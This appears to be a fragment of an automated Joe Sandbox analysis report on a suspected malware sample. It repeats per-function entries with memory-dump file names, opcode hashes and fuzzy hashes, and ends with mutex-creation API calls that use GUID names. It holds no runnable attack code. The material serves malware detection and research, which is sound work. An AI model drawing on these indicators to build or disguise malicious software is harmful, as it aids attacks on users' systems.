                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 2aad1ace9f17e27fc90b6d8408a6fd0dde4342c6dd5611bbc4c971f1f4f8439c
                                                                                                        • Instruction ID: 32f1bf6964badfef89476a3ef5b66bb544ce16b169a87ae8a89e7d0f97e2adc0
                                                                                                        • Opcode Fuzzy Hash: 2aad1ace9f17e27fc90b6d8408a6fd0dde4342c6dd5611bbc4c971f1f4f8439c
                                                                                                        • Instruction Fuzzy Hash: 9E71E473E24B254B8314DEB98D94192F2F1EF88610B57C27CCE84D7B41EB71B95A96C0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F15057 Relevance: .2, Instructions: 216COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: a34512ff72d5238815f0e29e494786616004433761634013c39009702cee8180
                                                                                                        • Instruction ID: 0b8f197cc8fc21687ecf7798bd0f987d9b5b4044e059963236d9c573f513914b
                                                                                                        • Opcode Fuzzy Hash: a34512ff72d5238815f0e29e494786616004433761634013c39009702cee8180
                                                                                                        • Instruction Fuzzy Hash: 578147B2A047019FC328CF19D88566AF3E1FFD8210F15892DE99E93B40D770F8558B92
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F184C0 Relevance: .2, Instructions: 207COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: ad9f3a43cb7dd3b518013f9b6064ab15edb1b03e1d503d3f24361335b78b864c
                                                                                                        • Instruction ID: 7067e6436cf3201abe232207c7ab5478451174f00f9102ba69799b304c4583ee
                                                                                                        • Opcode Fuzzy Hash: ad9f3a43cb7dd3b518013f9b6064ab15edb1b03e1d503d3f24361335b78b864c
                                                                                                        • Instruction Fuzzy Hash: 7471F622535B7A0AEBC3DA3D885046BF7D0BE4910AB850956DCD0F3181D72EDE4E77A4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F19CF9 Relevance: .2, Instructions: 197COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 3d5cdb525d0acefe293bc2cb43d2c02f70863ca624e14ca51f49ae32e7611bbb
                                                                                                        • Instruction ID: 45e93c6b70b1846ba4ca5ae878473613478930458bc49b35d758b0f7b621e062
                                                                                                        • Opcode Fuzzy Hash: 3d5cdb525d0acefe293bc2cb43d2c02f70863ca624e14ca51f49ae32e7611bbb
                                                                                                        • Instruction Fuzzy Hash: C4815976A147669BD714CF2AD8D049AFBF1FB08310B518A2AD8A583B40D334F5A5DFE0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F18780 Relevance: .2, Instructions: 160COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 851fc9b6f54d0d524cfed56ff25d709cf64ba4b7deb611180c80db8baab8909e
                                                                                                        • Instruction ID: 5e5a7a1af982a6eec397b56c03de4509d1126de9c7a8493baf0127b3901185fd
                                                                                                        • Opcode Fuzzy Hash: 851fc9b6f54d0d524cfed56ff25d709cf64ba4b7deb611180c80db8baab8909e
                                                                                                        • Instruction Fuzzy Hash: 1561A33390467B5BDB649E6DD8401A9B7A2BFC4350F5B8A75DC9823642C234EA11DBD0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F170E0 Relevance: .2, Instructions: 152COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e99aa2f60f3c65b998b8173ecf6d62a85e0283f60168b484be672eab7d553dce
                                                                                                        • Instruction ID: 6fc5d57634d42f2410e8b92ab2cdf36b66cb584c52072b6e6d0e6551b7b34d4a
                                                                                                        • Opcode Fuzzy Hash: e99aa2f60f3c65b998b8173ecf6d62a85e0283f60168b484be672eab7d553dce
                                                                                                        • Instruction Fuzzy Hash: 61617C3791262B9BD761DF59D84527AB3A2EFC4360F6B8A358C0427642C734F9119AC4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F16EE0 Relevance: .1, Instructions: 148COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 213e8dd87d5c2f66bb6fb1c01bf5d713fa88062fa37de47d36406d71930442ef
                                                                                                        • Instruction ID: f0bbc6164fe115f7ba2757cc5a559f653448d54a8db61039f21a581596d43bfd
                                                                                                        • Opcode Fuzzy Hash: 213e8dd87d5c2f66bb6fb1c01bf5d713fa88062fa37de47d36406d71930442ef
                                                                                                        • Instruction Fuzzy Hash: A151DE229257B945EBC3DA3D88504AEBBE0BE49206B46055BDCD0B3181C72EDE4DB7E4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F16880 Relevance: .1, Instructions: 128COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 7d91c7687d8e85e62bc80eb2502b46881ecafdad5d685667df6fa97b6554fb78
                                                                                                        • Instruction ID: f0ef39fb87bbcbabf7c087ccc32622f448b38fccad3fa450d398332d7bff4148
                                                                                                        • Opcode Fuzzy Hash: 7d91c7687d8e85e62bc80eb2502b46881ecafdad5d685667df6fa97b6554fb78
                                                                                                        • Instruction Fuzzy Hash: C4417C72E1872E47E34CFE169C9421AB39397C0250F4A8B3CCE5A973C1DA35B926C6C1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F16740 Relevance: .1, Instructions: 99COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: dad9f5e2b4397fc96ae248ae23b4bb8b0f73d482c6b1a500fc30c3239f901945
                                                                                                        • Instruction ID: 0490d86b4bce045c3c4fd50df124024f9d30e3e971c92668636fd4ef92e6cccb
                                                                                                        • Opcode Fuzzy Hash: dad9f5e2b4397fc96ae248ae23b4bb8b0f73d482c6b1a500fc30c3239f901945
                                                                                                        • Instruction Fuzzy Hash: 40315E7682976A4FC3D3FE61894010AF291FFC5118F4D4B6CCD505B690D73EAA4A9A82
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F169F3 Relevance: .1, Instructions: 92COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 2546dc63a4d397b90d566686cd8396e2c173d53ae3b0b387b31168de1b73c066
                                                                                                        • Instruction ID: 84ea0c41d7d54d0ac2b9802aeacb1daab3f7fcff3e7018c8f800a21bf5de6f20
                                                                                                        • Opcode Fuzzy Hash: 2546dc63a4d397b90d566686cd8396e2c173d53ae3b0b387b31168de1b73c066
                                                                                                        • Instruction Fuzzy Hash: 0731F2706183419FD741EF29C880A8BF7E5FFC8358F05C959F9889B221D734A985DBA2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F30F30 Relevance: .1, Instructions: 76COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                        • Instruction ID: 1ee4ded40b3fa2fa97b33232b5a85d1c38807d22ddac25f90b12ef7aeca24587
                                                                                                        • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                        • Instruction Fuzzy Hash: 84112B7BA4518143D634CA3DD4B4AFBA395EFC5331F2C437BD0418B758DA22E945B500
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F1A660 Relevance: .1, Instructions: 71COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d5d2e5b651617a4f85808dc17347bd2f4f1c2507898c94840b2185a5104128c2
                                                                                                        • Instruction ID: 90a37267b5c5a23d32dad7d8286a1112641ec90492ac38e6cb0d295d4478e489
                                                                                                        • Opcode Fuzzy Hash: d5d2e5b651617a4f85808dc17347bd2f4f1c2507898c94840b2185a5104128c2
                                                                                                        • Instruction Fuzzy Hash: 88111F4A8492C4BDCF424A7840E56EBFFA58E37218F5A71DAC8C45B753D01B190FE7A1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F19DFA Relevance: .0, Instructions: 36COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: f7a2a3c4e4e7b1265b14b7c3247eccdedd29083849295e66ade5a7e6f19b4579
                                                                                                        • Instruction ID: e8c2067b7dda74bdd1fa97ec87f47b6fb51a9a3540bdbf2de386efe37848556c
                                                                                                        • Opcode Fuzzy Hash: f7a2a3c4e4e7b1265b14b7c3247eccdedd29083849295e66ade5a7e6f19b4579
                                                                                                        • Instruction Fuzzy Hash: 01014F768146629BD700DF3ED8C0456FBF1BB082117528B36DC9083A41D334F562DBE4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F11193 Relevance: .0, Instructions: 27COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c8436146be692220618587e495f94de66f064fab2dd797080bc919182742124d
                                                                                                        • Instruction ID: e632d2071b7f95a13dc165cd3c260e4860b0f856fbb3b94e72a685af9f0cbca8
                                                                                                        • Opcode Fuzzy Hash: c8436146be692220618587e495f94de66f064fab2dd797080bc919182742124d
                                                                                                        • Instruction Fuzzy Hash: 0CE08675800006AADE11CD24DD81BE1F3EAF7E2724F588954F585D7009D33995599762
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F224E0 Relevance: 79.0, APIs: 36, Strings: 9, Instructions: 214synchronizationCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 00F224FE
                                                                                                        • GetLastError.KERNEL32 ref: 00F22509
                                                                                                        • CloseHandle.KERNEL32 ref: 00F2251C
                                                                                                        • CloseHandle.KERNEL32 ref: 00F22539
                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}), ref: 00F22550
                                                                                                        • GetLastError.KERNEL32 ref: 00F2255B
                                                                                                        • CloseHandle.KERNEL32 ref: 00F2256E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseHandle$CreateErrorLastMutex
